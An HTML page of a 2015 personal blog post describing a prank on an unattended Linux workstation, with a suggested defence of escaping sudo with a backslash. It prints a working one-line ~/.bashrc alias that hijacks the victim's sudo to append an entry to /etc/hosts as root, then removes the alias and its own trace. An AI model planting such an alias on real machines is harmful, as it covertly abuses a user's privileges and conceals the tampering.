<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <title>Prank - alias sudo in BASH (or why you should start escaping privilege-escalating commands)</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="description" content="" />
    <meta name="author" content="" />
    <meta name="keywords" content="" />
    <meta name="generator" content"JBake" />

    <!-- Le styles -->
    <link href="/css/bootstrap.min.css" rel="stylesheet" />
    <link href="/css/asciidoctor.css" rel="stylesheet" />
    <link href="/css/base.css" rel="stylesheet" />
    <link href="/css/bootstrap-responsive.min.css" rel="stylesheet" />

    <!-- HTML5 shim, for IE6-8 support of HTML5 elements -->
    <!--[if lt IE 9]>
      <script src="/js/html5shiv.js"></script>
    <![endif]-->

    <!-- Fav and touch icons -->
    <!--<link rel="apple-touch-icon-precomposed" sizes="144x144" href="../assets/ico/apple-touch-icon-144-precomposed.png">
    <link rel="apple-touch-icon-precomposed" sizes="114x114" href="../assets/ico/apple-touch-icon-114-precomposed.png">
    <link rel="apple-touch-icon-precomposed" sizes="72x72" href="../assets/ico/apple-touch-icon-72-precomposed.png">
    <link rel="apple-touch-icon-precomposed" href="../assets/ico/apple-touch-icon-57-precomposed.png">-->
    <link rel="shortcut icon" href="favicon.ico" />

    <link rel="alternate" type="application/atom+xml" href="https://blog.grdryn.me/feed.xml" title="Gerard Ryan's blog (All)" />
    <link rel="alternate" type="application/atom+xml" href="https://blog.grdryn.me/customfeeds/fedora.xml" title="Gerard Ryan's blog (Fedora-related)" />

    <link rel="webmention" href="https://webmention.herokuapp.com/api/webmention" />

  </head>
  <body>
    <div id="wrap">
	
	<!-- Fixed navbar -->
      <div class="navbar navbar-fixed-top">
        <div class="navbar-inner">
          <div class="container">
            <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
              <span class="icon-bar"></span>
              <span class="icon-bar"></span>
              <span class="icon-bar"></span>
            </button>
            <a class="brand" href="/">blog.grdryn.me</a>
            <div class="nav-collapse collapse">
              <ul class="nav">
                <li><a href="/about.html">About</a></li>
                <li><a href="https://github.com/grdryn" rel="me">Github</a></li>
                <li><a href="https://mastodon.social/@grdryn" rel="me">Mastodon</a></li>
                <li><a href="https://libre.fm/user/grdryn" rel="me">Libre.fm</a></li>
                <li><a href="https://www.last.fm/user/grdryn" rel="me">Last.fm</a></li>
                <li><a href="https://twitter.com/grdryn" rel="me">Twitter</a></li>
              </ul>
            </div><!--/.nav-collapse -->
          </div>
        </div>
      </div>
      <div class="container">
	
	<div class="page-header">
		<h1>Prank - alias sudo in BASH (or why you should start escaping privilege-escalating commands)</h1>
	</div>

	<p><em>11 January 2015</em></p>

	<p><div class="paragraph">
<p>A little while ago, a friend and I had an idea for a prank to play on someone
who leaves their Linux-based workstation unlocked and unattended (I guess this
would work for OS X also, but I don&#8217;t have enough experience with that to say
for sure).</p>
</div>
<div class="paragraph">
<p>The goal was to write a line to the target&#8217;s <code>/etc/hosts</code> file. For this, we
would need privileged access. Now, we know the target well enough to know that
they use the familiar <code>sudo</code> command for various tasks, such as installing new
packages. We pondered a while on how we could make it work, and came up with a
possibility: what if we could set an alias for <code>sudo</code> in the users BASH
configuration file, that would executed our desired command?</p>
</div>
<div class="paragraph">
<p>We figured out this part quite quickly, but then pondered on how we could
improve it: what if we could delete the evidence after executing? The perfect
crime.</p>
</div>
<div class="paragraph">
<p>The following was our final incantation in <code>~/.bashrc</code>:</p>
</div>
<div class="paragraph">
<p><code>alias sudo='/usr/bin/sudo sh -c "echo \"127.0.0.1 twitter.com\" &gt;&gt; /etc/hosts" &amp;&amp; unalias sudo &amp;&amp; sed -i -e "s/alias sudo.*//" ~/.bashrc &amp;&amp; sudo'</code></p>
</div>
<div class="paragraph">
<p>One way to defend against being fooled by this humourous prank (or malicious
attack?) is to prepend a backslash before sensitive commands such as this (so
<code>sudo</code> becomes <code>\sudo</code>). This tells BASH to ignore aliases, and use the command
directly from the PATH. The question comes to me though, should certain commands
be restricted from aliasing?</p>
</div>
<div class="paragraph">
<p>Our intentions were innocent and light-hearted (and our results were glorious!),
but one can see how malice could easily be introduced.</p>
</div></p>

	<hr>

        <div class="responses">
                <h3>Responses</h3>
                <script id="webmention-hosted">
                        (function () {
                                var sn = document.createElement("script"), s = document.getElementsByTagName("script")[0], url;
                                url = document.querySelectorAll ? document.querySelectorAll("link[rel~=canonical]") : false;
                                url = url && url[0] ? url[0].href : false;
                                sn.type = "text/javascript"; sn.async = true;
                                sn.src = "https://webmention.herokuapp.com/api/embed?url=" + encodeURIComponent(url || window.location);
                                s.parentNode.insertBefore(sn, s);
                        }());
                </script>
        </div>

		</div>
		<div id="push"></div>
    </div>
    
    <div id="footer">
      <div class="container">
        <p class="muted credit">&copy; 2018 | Mixed with <a href="http://twitter.github.com/bootstrap/">Bootstrap v2.3.1</a> | Baked with <a href="http://jbake.org">JBake v2.6.7</a></p>
      </div>
    </div>
    
    <!-- Le javascript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src="/js/jquery-1.9.1.min.js"></script>
    <script src="/js/bootstrap.min.js"></script>
    <script src="/js/run_prettify.js"></script>
    
  </body>
</html>
